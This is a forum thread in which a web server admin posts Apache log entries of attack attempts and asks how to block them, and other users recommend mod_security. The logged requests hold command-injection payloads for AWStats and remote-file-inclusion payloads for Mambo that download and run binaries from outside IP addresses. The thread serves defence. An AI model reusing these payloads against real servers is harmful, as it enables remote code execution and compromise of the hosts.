# apache: Block specific request patterns [SOLVED]

## gouranga

Every day when checking my logs, I come across the same entries.

Doesn't there exist a module that block these request , so script kidies don't waste my bandwith?

I already have installed mod_evasive, but the scripts wait to long to make a new request.

I can't change it to a higher value. The forum would then get blacklisted,..

```
210.253.115.35 - - [23/Dec/2005:23:32:55 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 285

kando-kzai.jp - - [23/Dec/2005:23:32:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 403 289

kando-kzai.jp - - [23/Dec/2005:23:32:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 403 297

210.253.115.35 - - [23/Dec/2005:23:33:00 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 200 315

210.253.115.35 - - [23/Dec/2005:23:33:00 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 200 1033

210.253.115.35 - - [23/Dec/2005:23:33:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 283

210.253.115.35 - - [23/Dec/2005:23:33:03 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 404 287

193.203.240.228 - - [24/Dec/2005:17:42:09 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 1033

193.203.240.228 - - [24/Dec/2005:17:42:10 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 315

193.203.240.228 - - [24/Dec/2005:17:42:11 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 283

193.203.240.228 - - [24/Dec/2005:17:42:12 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 281

193.203.240.228 - - [24/Dec/2005:17:42:13 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 287

193.203.240.228 - - [24/Dec/2005:17:42:14 +0100] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 287

```

Last edited by gouranga on Sun Dec 25, 2005 10:11 pm; edited 1 time in total

----------

## steveb

you could install mod_security and bock the requests.

cheers

SteveB

----------

## cynric

You will probably want to look at something like mod_security. This allows for custom filters. Hope that helps.

[edit] Looks like steveb beat me to it.

----------

## gouranga

I finally installed and configured mod_security.

It solved all my problems at last.

Content spam & script kiddies are more or less under control.

See also https://forums.gentoo.org/viewtopic-p-2981900.html#2981900

I tried to summarize a few steps to get mod_sec working in this thread.

I didn't found any howto's on mod_security.

Maybe when I have the time I will write one.

Thx for the replies.

----------

## cynric

Glad you got it working. mod_security is a beast of module, but does some really nice things. This isn't mod_sec specific, more hardenening, but might be of some use as well: How's Your Network - Hardenening.

----------

